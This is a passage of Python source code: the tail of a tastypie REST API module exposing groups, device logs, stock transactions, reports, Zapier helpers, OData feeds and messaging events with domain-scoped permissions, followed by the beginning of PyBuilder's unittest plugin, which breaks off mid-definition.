                # Any other differing attribute is copied verbatim.
                setattr(bundle.obj, key, value)
                should_save = True
        return should_save

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        # Accept a Bundle, a bare object, or None (delegates to tastypie).
        if bundle_or_obj is None:
            return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return self._get_resource_uri(obj)

    def _get_resource_uri(self, obj):
        # This function is called up to 1000 times per request
        # so build url from a known string template
        # to avoid calling the expensive `reverse` function each time
        return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)

    @memoized_property
    def _get_resource_uri_template(self):
        """Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
        return reverse('api_dispatch_detail', kwargs=dict(
            resource_name=self._meta.resource_name,
            api_name=self._meta.api_name,
            domain='__domain__',
            pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')

    def obj_create(self, bundle, request=None, **kwargs):
        # Group names must be unique within a domain.
        if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
            bundle.obj = Group(bundle.data)
            bundle.obj.name = bundle.obj.name or ''
            bundle.obj.domain = kwargs['domain']
            bundle.obj.save()
            # NOTE(review): set_groups replaces each user's entire group list
            # with only this group -- confirm that is intended.
            for user in bundle.obj.users:
                CommCareUser.get(user).set_groups([bundle.obj._id])
        else:
            raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
        return bundle

    def obj_update(self, bundle, **kwargs):
        """Update an existing group, asserting it belongs to the URL domain."""
        bundle.obj = Group.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        if self._update(bundle):
            assert bundle.obj.domain == kwargs['domain']
            bundle.obj.save()
        return bundle

    def obj_delete(self, bundle, **kwargs):
        # Soft delete so the group can be audited/restored.
        group = self.obj_get(bundle, **kwargs)
        group.soft_delete()
        return bundle
class DomainAuthorization(ReadOnlyAuthorization):
    """Restrict list reads to objects belonging to the requesting domain.

    ``domain_key`` is the ORM filter path to the domain field on the queryset
    (e.g. ``'report__domain'`` for related models).
    """

    def __init__(self, domain_key='domain', *args, **kwargs):
        # Bug fix: forward remaining arguments to the base class; previously
        # *args/**kwargs were silently swallowed without calling
        # super().__init__().
        super().__init__(*args, **kwargs)
        self.domain_key = domain_key

    def read_list(self, object_list, bundle):
        return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
    """Read-only access to device log entries, scoped to the request domain."""

    class Meta(object):
        resource_name = 'device-log'
        queryset = DeviceReportEntry.objects.all()
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization()
        paginator_class = NoCountingPaginator
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        # this is needed for the domain filtering but any values passed in via the URL get overridden
        filtering = {
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            "user_id": ('exact',),
            "username": ('exact',),
            "type": ('exact',),
            "xform_id": ('exact',),
            "device_id": ('exact',),
        }
class StockTransactionResource(HqBaseResource, ModelResource):
    """Read-only stock transactions with report-date range filtering."""

    class Meta(object):
        queryset = StockTransaction.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'stock_transaction'
        authentication = RequirePermissionAuthentication(Permissions.view_reports)
        paginator_class = NoCountingPaginator
        authorization = DomainAuthorization(domain_key='report__domain')
        filtering = {
            "case_id": ('exact',),
            # Bug fix: was ('exact') -- a bare string, not a one-tuple.
            "section_id": ('exact',),
        }
        fields = ['case_id', 'product_id', 'type', 'section_id', 'quantity', 'stock_on_hand']
        include_resource_uri = False

    def build_filters(self, filters=None):
        """Translate start_date/end_date GET params into report-date bounds."""
        # Bug fix: guard the default None before membership tests below.
        if filters is None:
            filters = {}
        orm_filters = super(StockTransactionResource, self).build_filters(filters)
        if 'start_date' in filters:
            orm_filters['report__date__gte'] = filters['start_date']
        if 'end_date' in filters:
            orm_filters['report__date__lte'] = filters['end_date']
        return orm_filters

    def dehydrate(self, bundle):
        # Denormalize the product name and report date into the response.
        bundle.data['product_name'] = bundle.obj.sql_product.name
        bundle.data['transaction_date'] = bundle.obj.report.date
        return bundle
# Container for one page of configurable-report results plus paging metadata
# (returned by ConfigurableReportDataResource.obj_get).
ConfigurableReportData = namedtuple("ConfigurableReportData", [
    "data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A resource that replicates the behavior of the ajax part of the
    ConfigurableReportView view.
    """
    data = fields.ListField(attribute="data", readonly=True)
    columns = fields.ListField(attribute="columns", readonly=True)
    total_records = fields.IntegerField(attribute="total_records", readonly=True)
    next_page = fields.CharField(attribute="next_page", readonly=True)

    # Default page size and hard cap for the `limit` GET parameter.
    LIMIT_DEFAULT = 50
    LIMIT_MAX = 50

    def _get_start_param(self, bundle):
        # Parse the `offset` GET parameter; must be a non-negative integer.
        try:
            start = int(bundle.request.GET.get('offset', 0))
            if start < 0:
                raise ValueError
        except (ValueError, TypeError):
            raise BadRequest("start must be a positive integer.")
        return start

    def _get_limit_param(self, bundle):
        # Parse the `limit` GET parameter; must be a non-negative integer no
        # larger than LIMIT_MAX.
        try:
            limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
            if limit < 0:
                raise ValueError
        except (ValueError, TypeError):
            raise BadRequest("limit must be a positive integer.")

        if limit > self.LIMIT_MAX:
            raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
        return limit

    def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
        # Build the URL of the next page, or "" when this is the last page.
        if total_records > start + limit:
            start += limit
            new_get_params = get_query_dict.copy()
            new_get_params["offset"] = start
            # limit has not changed, but it may not have been present in get params before.
            new_get_params["limit"] = limit
            return reverse('api_dispatch_detail', kwargs=dict(
                api_name=self._meta.api_name,
                resource_name=self._meta.resource_name,
                domain=domain,
                pk=id_,
            )) + "?" + new_get_params.urlencode()
        else:
            return ""

    def _get_report_data(self, report_config, domain, start, limit, get_params):
        """Run the report and return (page_rows, column_specs, total_records)."""
        report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)

        # Filters without an explicit datatype are treated as strings.
        string_type_params = [
            filter.name
            for filter in report_config.ui_filters
            if getattr(filter, 'datatype', 'string') == "string"
        ]
        filter_values = get_filter_values(
            report_config.ui_filters,
            query_dict_to_dict(get_params, domain, string_type_params)
        )
        report.set_filter_values(filter_values)

        page = list(report.get_data(start=start, limit=limit))

        columns = []
        for column in report.columns:
            simple_column = {
                "header": column.header,
                "slug": column.slug,
            }
            if isinstance(column, UCRExpandDatabaseSubcolumn):
                # Expanded columns additionally carry the value they expand on.
                simple_column['expand_column_value'] = column.expand_value
            columns.append(simple_column)

        total_records = report.get_total_records()
        return page, columns, total_records

    def obj_get(self, bundle, **kwargs):
        """Return one page of report data as a ConfigurableReportData tuple."""
        domain = kwargs['domain']
        pk = kwargs['pk']
        start = self._get_start_param(bundle)
        limit = self._get_limit_param(bundle)

        report_config = self._get_report_configuration(pk, domain)
        page, columns, total_records = self._get_report_data(
            report_config, domain, start, limit, bundle.request.GET)

        return ConfigurableReportData(
            data=page,
            columns=columns,
            total_records=total_records,
            id=report_config._id,
            domain=domain,
            get_params=bundle.request.GET,
            next_page=self._get_next_page(
                domain,
                report_config._id,
                start,
                limit,
                total_records,
                bundle.request.GET,
            )
        )

    def _get_report_configuration(self, id_, domain):
        """
        Fetch the required ReportConfiguration object
        :param id_: The id of the ReportConfiguration
        :param domain: The domain of the ReportConfiguration
        :return: A ReportConfiguration
        """
        try:
            # Static configs live in code; dynamic ones in the document store.
            if report_config_id_is_static(id_):
                return StaticReportConfiguration.by_id(id_, domain=domain)
            else:
                return get_document_or_not_found(ReportConfiguration, domain, id_)
        except DocumentNotFound:
            raise NotFound

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj).id,
        }

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
        # Always echo explicit paging params back in the URI.
        uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
        if bundle_or_obj is not None and uri:
            get_params = get_obj(bundle_or_obj).get_params.copy()
            if "offset" not in get_params:
                get_params["offset"] = 0
            if "limit" not in get_params:
                get_params["limit"] = self.LIMIT_DEFAULT
            uri += "?{}".format(get_params.urlencode())
        return uri

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
        list_allowed_methods = []
        detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
    """Read-only metadata (title, filters, columns) of report configurations."""

    id = fields.CharField(attribute='get_id', readonly=True, unique=True)
    title = fields.CharField(readonly=True, attribute="title", null=True)
    filters = fields.ListField(readonly=True)
    columns = fields.ListField(readonly=True)

    def dehydrate_filters(self, bundle):
        # Expose only type/datatype/slug for each report filter.
        return [
            {"type": spec["type"], "datatype": spec["datatype"], "slug": spec["slug"]}
            for spec in bundle.obj.filters
        ]

    def dehydrate_columns(self, bundle):
        # Expose only column_id/display/type for each report column.
        return [
            {"column_id": spec['column_id'], "display": spec['display'], "type": spec["type"]}
            for spec in bundle.obj.columns
        ]

    def obj_get(self, bundle, **kwargs):
        # Translate a missing document into tastypie's NotFound.
        try:
            return get_document_or_404(ReportConfiguration, kwargs['domain'], kwargs['pk'])
        except Http404 as e:
            raise NotFound(str(e))

    def obj_get_list(self, bundle, **kwargs):
        return ReportConfiguration.by_domain(kwargs['domain'])

    def detail_uri_kwargs(self, bundle_or_obj):
        obj = get_obj(bundle_or_obj)
        return {'domain': obj.domain, 'pk': obj._id}

    class Meta(CustomResourceMeta):
        list_allowed_methods = ["get"]
        detail_allowed_methods = ["get"]
        paginator_class = DoesNothingPaginator
# (domain_name, project_name) row returned by UserDomainsResource; both
# fields default to the empty string.
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
    """List the requesting user's domains that have the Zapier privilege."""

    domain_name = fields.CharField(attribute='domain_name')
    project_name = fields.CharField(attribute='project_name')

    class Meta(object):
        resource_name = 'user_domains'
        authentication = LoginAuthentication(allow_session_auth=True)
        object_class = UserDomain
        include_resource_uri = False

    def dispatch_list(self, request, **kwargs):
        # Rewrite auth failures with a friendlier message; everything else
        # propagates unchanged.
        try:
            return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
        except ImmediateHttpResponse as immediate_http_response:
            if not isinstance(immediate_http_response.response, HttpUnauthorized):
                raise
            raise ImmediateHttpResponse(response=HttpUnauthorized(
                content='Username or API Key is incorrect',
                content_type='text/plain',
            ))

    def obj_get_list(self, bundle, **kwargs):
        return self.get_object_list(bundle.request)

    def get_object_list(self, request):
        couch_user = CouchUser.from_django_user(request.user)
        eligible_domains = [
            name for name in couch_user.get_domains()
            if domain_has_privilege(name, privileges.ZAPIER_INTEGRATION)
        ]
        results = []
        for name in eligible_domains:
            domain_object = Domain.get_by_name(name)
            results.append(UserDomain(
                domain_name=domain_object.name,
                project_name=domain_object.hr_name or domain_object.name,
            ))
        return results
class IdentityResource(CorsResourceMixin, Resource):
    """Expose the authenticated couch user as a single-object response."""

    class Meta(object):
        resource_name = 'identity'
        authentication = LoginAuthentication()
        serializer = ListToSingleObjectSerializer()
        detail_allowed_methods = []
        list_allowed_methods = ['get']
        object_class = CouchUser
        include_resource_uri = False

    id = fields.CharField(attribute='get_id', readonly=True)
    username = fields.CharField(attribute='username', readonly=True)
    first_name = fields.CharField(attribute='first_name', readonly=True)
    last_name = fields.CharField(attribute='last_name', readonly=True)
    email = fields.CharField(attribute='email', readonly=True)

    def obj_get_list(self, bundle, **kwargs):
        # The "list" is always exactly the requesting user.
        return [bundle.request.couch_user]
# (form_xmlns, form_name) row returned by DomainForms; both fields default
# to the empty string.
Form = namedtuple('Form', 'form_xmlns form_name')
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
    """
    Returns: list of forms for a given domain with form name formatted for display in Zapier
    """
    form_xmlns = fields.CharField(attribute='form_xmlns')
    form_name = fields.CharField(attribute='form_name')

    class Meta(object):
        resource_name = 'domain_forms'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = Form
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 200
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        application_id = bundle.request.GET.get('application_id')
        if not application_id:
            raise NotFound('application_id parameter required')

        application = Application.get(docid=application_id)
        if not application:
            return []

        # Render each form as "App > Module > Form" for display in Zapier.
        forms = []
        for entry in application.get_forms(bare=False):
            display = '{} > {} > {}'.format(
                application.name,
                entry['module'].default_name(),
                entry['form'].default_name(),
            )
            forms.append(Form(form_xmlns=entry['form'].xmlns, form_name=display))
        return forms
# (case_type, placeholder) row returned by DomainCases; both fields default
# to the empty string.
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
CaseType = namedtuple('CaseType', 'case_type placeholder')
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
    """
    Returns: list of case types for a domain
    Note: only returns case types for which at least one case has been made
    """
    placeholder = fields.CharField(attribute='placeholder')
    case_type = fields.CharField(attribute='case_type')

    class Meta(object):
        resource_name = 'domain_cases'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = CaseType
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 100
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        # One row per case type known to Elasticsearch for this domain.
        return [
            CaseType(case_type=name)
            for name in get_case_types_for_domain_es(kwargs['domain'])
        ]
# (user_id, user_name) row returned by DomainUsernames; both fields default
# to the empty string.
UserInfo = namedtuple('UserInfo', 'user_id user_name')
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
    """
    Returns: list of usernames for a domain.
    """
    user_id = fields.CharField(attribute='user_id')
    user_name = fields.CharField(attribute='user_name')

    class Meta(object):
        resource_name = 'domain_usernames'
        authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
        object_class = User
        include_resource_uri = False
        allowed_methods = ['get']

    def obj_get_list(self, bundle, **kwargs):
        # Strip the @domain suffix from each username before returning.
        pairs = get_all_user_id_username_pairs_by_domain(kwargs['domain'])
        return [
            UserInfo(user_id=user_id, user_name=raw_username(username))
            for user_id, username in pairs
        ]
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
    """Common behavior for OData feeds: privilege check, access metrics, and
    OData-specific response payload fields and headers."""

    # Set per-request in dispatch() from the URL kwargs.
    config_id = None
    table_id = None

    def dispatch(self, request_type, request, **kwargs):
        # Feeds are gated on the ODATA_FEED privilege.
        if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
            raise ImmediateHttpResponse(
                response=HttpResponseNotFound('Feature flag not enabled.')
            )
        self.config_id = kwargs['config_id']
        # table_id is optional in the URL; default to the first table.
        self.table_id = int(kwargs.get('table_id', 0))

        # Time the whole dispatch and report it to datadog.
        with TimingContext() as timer:
            response = super(BaseODataResource, self).dispatch(
                request_type, request, **kwargs
            )
        record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
        return response

    def create_response(self, request, data, response_class=HttpResponse,
                        **response_kwargs):
        # Attach the feed context the OData serializer needs.
        data['domain'] = request.domain
        data['config_id'] = self.config_id
        data['api_path'] = request.path
        data['table_id'] = self.table_id
        response = super(BaseODataResource, self).create_response(
            request, data, response_class, **response_kwargs)
        return add_odata_headers(response)

    def detail_uri_kwargs(self, bundle_or_obj):
        # Not sure why this is required but the feed 500s without it
        return {
            'pk': get_obj(bundle_or_obj)['_id']
        }

    def determine_format(self, request):
        # Results should be sent as JSON
        return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
    """OData feed over cases for a saved CaseExportInstance config."""

    def obj_get_list(self, bundle, domain, **kwargs):
        config = get_document_or_404(CaseExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(ugettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_case_export_base_query(domain, config.case_type)
        # Apply each saved export filter. (Renamed loop variable: the
        # original shadowed the builtin `filter`.)
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())

        # Restrict to the user's locations unless they can see all of them.
        if not bundle.request.couch_user.has_permission(
                domain, 'access_all_locations'):
            query = query_location_restricted_cases(query, bundle.request)
        return query

    class Meta(v0_4.CommCareCaseResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/cases'
        serializer = ODataCaseSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        # The table-specific feed URL comes first so it wins over the
        # table-less variant.
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
@location_safe
class ODataFormResource(BaseODataResource):
    """OData feed over form submissions for a saved FormExportInstance config."""

    def obj_get_list(self, bundle, domain, **kwargs):
        config = get_document_or_404(FormExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(ugettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
        # Apply each saved export filter. (Renamed loop variable: the
        # original shadowed the builtin `filter`.)
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())

        # Restrict to the user's locations unless they can see all of them.
        if not bundle.request.couch_user.has_permission(
                domain, 'access_all_locations'):
            query = query_location_restricted_forms(query, bundle.request)
        return query

    class Meta(v0_4.XFormInstanceResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/forms'
        serializer = ODataFormSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        # The table-specific feed URL comes first so it wins over the
        # table-less variant.
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
class MessagingEventResourceNew(HqBaseResource, ModelResource):
    """Read-only resource over MessagingSubEvent rows with nested
    source/recipient/form/error details plus the individual messages sent."""

    # Computed, nested payload sections (built by the dehydrate_* methods).
    source = fields.DictField()
    recipient = fields.DictField()
    form = fields.DictField()
    error = fields.DictField()
    messages = fields.ListField()

    def dehydrate(self, bundle):
        # The domain lives on the parent MessagingEvent.
        bundle.data["domain"] = bundle.obj.parent.domain
        return bundle

    def dehydrate_status(self, bundle):
        """Slug for the event status; completed survey events report the
        underlying xforms session status instead."""
        event = bundle.obj
        if event.status == MessagingEvent.STATUS_COMPLETED and event.xforms_session_id:
            return event.xforms_session.status_api
        return MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown')

    def dehydrate_content_type(self, bundle):
        return MessagingEvent.CONTENT_TYPE_SLUGS.get(bundle.obj.content_type, "unknown")

    def dehydrate_source(self, bundle):
        # Source info also comes from the parent event.
        parent = bundle.obj.parent
        return {
            "id": parent.source_id,
            "type": MessagingEvent.SOURCE_SLUGS.get(parent.source, 'unknown'),
            "display": get_event_display_api(parent),
        }

    def dehydrate_recipient(self, bundle):
        # Resolve the recipient id to a display name when possible.
        display_value = None
        if bundle.obj.recipient_id:
            display_value = case_or_user_id_to_name(bundle.obj.recipient_id, {
                "couch_recipient_doc_type": bundle.obj.get_recipient_doc_type()
            })
        return {
            "id": bundle.obj.recipient_id,
            "type": MessagingSubEvent.RECIPIENT_SLUGS.get(bundle.obj.recipient_type, "unknown"),
            "display": display_value or "unknown",
        }

    def dehydrate_form(self, bundle):
        """Form details for SMS/IVR survey events; None otherwise."""
        event = bundle.obj
        if event.content_type not in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
            return None

        submission_id = None
        if event.xforms_session_id:
            submission_id = event.xforms_session.submission_id
        return {
            "app_id": bundle.obj.app_id,
            "form_unique_id": bundle.obj.form_unique_id,
            "form_name": bundle.obj.form_name,
            "form_submission_id": submission_id,
        }

    def dehydrate_error(self, bundle):
        """Error details, or None when the event carries no error code."""
        event = bundle.obj
        if not event.error_code:
            return None
        return {
            "code": event.error_code,
            "message": MessagingEvent.ERROR_MESSAGES.get(event.error_code, None),
            "message_detail": event.additional_error_text
        }

    def dehydrate_messages(self, bundle):
        """Dispatch to the message-list builder for the event's content type."""
        event = bundle.obj
        if event.content_type == MessagingEvent.CONTENT_EMAIL:
            return self._get_messages_for_email(event)

        if event.content_type in (MessagingEvent.CONTENT_SMS, MessagingEvent.CONTENT_SMS_CALLBACK):
            return self._get_messages_for_sms(event)

        if event.content_type in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
            return self._get_messages_for_survey(event)
        return []  # see corehq.apps.reports.standard.sms.MessageEventDetailReport.rows

    def _get_messages_for_email(self, event):
        # Emails carry at most one message; '-' marks missing data.
        try:
            email = Email.objects.get(messaging_subevent=event.pk)
            content = email.body
            recipient_address = email.recipient_address
        except Email.DoesNotExist:
            content = '-'
            recipient_address = '-'

        return [{
            "date": event.date,
            "type": "email",
            "direction": "outgoing",
            "content": content,
            "status": MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown'),
            "backend": "email",
            "contact": recipient_address
        }]

    def _get_messages_for_sms(self, event):
        messages = SMS.objects.filter(messaging_subevent_id=event.pk)
        return self._get_message_dicts_for_sms(event, messages, "sms")

    def _get_messages_for_survey(self, event):
        if not event.xforms_session_id:
            return []

        xforms_session = event.xforms_session
        if not xforms_session:
            return []

        messages = SMS.objects.filter(xforms_session_couch_id=xforms_session.couch_id)
        type_ = "ivr" if event.content_type == MessagingEvent.CONTENT_IVR_SURVEY else "sms"
        return self._get_message_dicts_for_sms(event, messages, type_)

    def _get_message_dicts_for_sms(self, event, messages, type_):
        message_dicts = []
        for sms in messages:
            # Errored events keep the event-level status slug; otherwise use
            # the per-message SMS status.
            if event.status != MessagingEvent.STATUS_ERROR:
                status, _ = get_sms_status_display_raw(sms)
            else:
                status = MessagingEvent.STATUS_SLUGS.get(event.status, "unknown")
            message_dicts.append({
                "date": sms.date,
                "type": type_,
                "direction": SMS.DIRECTION_SLUGS.get(sms.direction, "unknown"),
                "content": sms.text,
                "status": status,
                "backend": get_backend_name(sms.backend_id) or sms.backend_id,
                "contact": sms.phone_number
            })
        return message_dicts

    def build_filters(self, filters=None, **kwargs):
        # Custom filtering for date etc
        # see corehq.apps.reports.standard.sms.MessagingEventsReport.get_filters
        return super(MessagingEventResourceNew, self).build_filters(filters, **kwargs)

    class Meta(object):
        queryset = MessagingSubEvent.objects.all()
        include_resource_uri = False
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'messaging-event'
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization('parent__domain')
        paginator_class = NoCountingPaginator
        # Raw coded columns that the dehydrate_* methods replace.
        excludes = {
            "error_code",
            "additional_error_text",
            "app_id",
            "form_name",
            "form_unique_id",
            "recipient_id",
            "recipient_type",
        }
        filtering = {
            # this is needed for the domain filtering but any values passed in via the URL get overridden
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),  # TODO: convert to date.gt etc
            # "source": ('exact',),  # TODO
            "content_type": ('exact',),  # TODO: convert from slug
            "status": ('exact',),  # TODO: convert from slug
            "error_code": ('exact',),  # TODO
            "case_id": ('exact',),
            # "contact": ('exact',),  # TODO
            # "parent": ('exact',),  # TODO
        }
        ordering = [
            'date',
        ]
class MessagingEventResource(HqBaseResource, ModelResource):
    """Legacy read-only resource over MessagingEvent rows."""

    # Human-readable variants of the coded model fields.
    content_type_display = fields.CharField(attribute='get_content_type_display')
    recipient_type_display = fields.CharField(attribute='get_recipient_type_display')
    status_display = fields.CharField(attribute='get_status_display')
    source_display = fields.CharField(attribute='get_source_display')

    class Meta(object):
        resource_name = 'messaging-event-old'
        queryset = MessagingEvent.objects.all()
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization()
        paginator_class = NoCountingPaginator
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        ordering = ['date']
        # 'domain' must be filterable for DomainAuthorization to work; any
        # URL-supplied values get overridden.
        filtering = {
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            "source": ('exact',),
            "content_type": ('exact',),
            "status": ('exact',),
        }
|
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2015 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Python 2/3 compatibility shim for StringIO.
try:
    from StringIO import StringIO  # Python 2
except ImportError:
    # Fix: the bound name `e` was never used; don't bind it.
    from io import StringIO  # Python 3
import sys
import unittest

from pybuilder.core import init, task, description, use_plugin
from pybuilder.errors import BuildFailedException
from pybuilder.utils import discover_modules_matching, render_report
from pybuilder.ci_server_interaction import test_proxy_for
from pybuilder.terminal import print_text_line

use_plugin("python.core")

# unittest's text result class was private before 2.7; alias whichever the
# running interpreter provides.
if sys.version_info < (2, 7):
    TextTestResult = unittest._TextTestResult  # brought to you by 2.6
else:
    TextTestResult = unittest.TextTestResult
class TestNameAwareTextTestRunner(unittest.TextTestRunner):
    """TextTestRunner that produces TestNameAwareTestResult objects.

    Carries a PyBuilder logger through to the result so each test start can
    be logged.
    """

    def __init__(self, logger, stream):
        self.logger = logger
        super(TestNameAwareTextTestRunner, self).__init__(stream=stream)

    def _makeResult(self):
        # Override the hook unittest uses to construct the result object.
        return TestNameAwareTestResult(self.logger, self.stream, self.descriptions, self.verbosity)
class TestNameAwareTestResult(TextTestResult):
    """Test result that records started tests and failure reasons.

    ``test_names`` collects every test that started;
    ``failed_test_names_and_reasons`` maps a test to an
    "ExceptionType: message" string with quotes stripped.
    """

    def __init__(self, logger, stream, descriptions, verbosity):
        self.test_names = []
        self.failed_test_names_and_reasons = {}
        self.logger = logger
        super(TestNameAwareTestResult, self).__init__(stream, descriptions, verbosity)

    def startTest(self, test):
        self.test_names.append(test)
        self.logger.debug("starting %s", test)
        super(TestNameAwareTestResult, self).startTest(test)

    def _record_reason(self, test, err):
        # Shared by addError/addFailure (previously duplicated): store a
        # quote-free "ExceptionType: message" description for the report.
        exception_type, exception, _ = err
        self.failed_test_names_and_reasons[test] = \
            '{0}: {1}'.format(exception_type, exception).replace('\'', '')

    def addError(self, test, err):
        self._record_reason(test, err)
        super(TestNameAwareTestResult, self).addError(test, err)

    def addFailure(self, test, err):
        self._record_reason(test, err)
        super(TestNameAwareTestResult, self).addFailure(test, err)
@init
def init_test_source_directory(project):
    """Seed the unittest plugin's properties without clobbering user overrides."""
    defaults = {
        "dir_source_unittest_python": "src/unittest/python",
        "unittest_module_glob": "*_tests",
        "unittest_file_suffix": None,  # deprecated, use unittest_module_glob.
        "unittest_test_method_prefix": None,
    }
    for name, value in defaults.items():
        project.set_property_if_unset(name, value)
@task
@description("Runs unit tests based on Python's unittest module")
def run_unit_tests(project, logger):
    """Discover and execute the project's unittest modules, write the report,
    and fail the build on test errors or failures."""
    test_dir = _register_test_and_source_path_and_return_test_dir(project, sys.path)

    # Legacy property: translate unittest_file_suffix into a module glob.
    unittest_file_suffix = project.get_property("unittest_file_suffix")
    if unittest_file_suffix is not None:
        logger.warn("unittest_file_suffix is deprecated, please use unittest_module_glob")
        module_glob = "*{0}".format(unittest_file_suffix)
        if module_glob.endswith(".py"):
            # Glob matches module names, not file names -- drop the extension.
            WITHOUT_DOT_PY = slice(0, -3)
            module_glob = module_glob[WITHOUT_DOT_PY]
        project.set_property("unittest_module_glob", module_glob)
    else:
        module_glob = project.get_property("unittest_module_glob")

    logger.info("Executing unittest Python modules in %s", test_dir)
    logger.debug("Including files matching '%s'", module_glob)

    try:
        test_method_prefix = project.get_property("unittest_test_method_prefix")
        result, console_out = execute_tests_matching(logger, test_dir, module_glob, test_method_prefix)

        if result.testsRun == 0:
            logger.warn("No unittests executed.")
        else:
            logger.info("Executed %d unittests", result.testsRun)

        write_report("unittest", project, logger, result, console_out)

        if not result.wasSuccessful():
            raise BuildFailedException("There were %d test error(s) and %d failure(s)"
                                       % (len(result.errors), len(result.failures)))
        logger.info("All unittests passed.")
    except ImportError as e:
        # Point the user at the exact import statement that failed inside a
        # test module, then fail the build.
        import traceback
        _, _, import_error_traceback = sys.exc_info()
        file_with_error, error_line, _, statement_causing_error = traceback.extract_tb(import_error_traceback)[-1]
        logger.error("Import error in unittest file {0}, due to statement '{1}' on line {2}".format(
            file_with_error, statement_causing_error, error_line))
        logger.error("Error importing unittests: %s", e)
        raise BuildFailedException("Unable to execute unit tests.")
def execute_tests(logger, test_source, suffix, test_method_prefix=None):
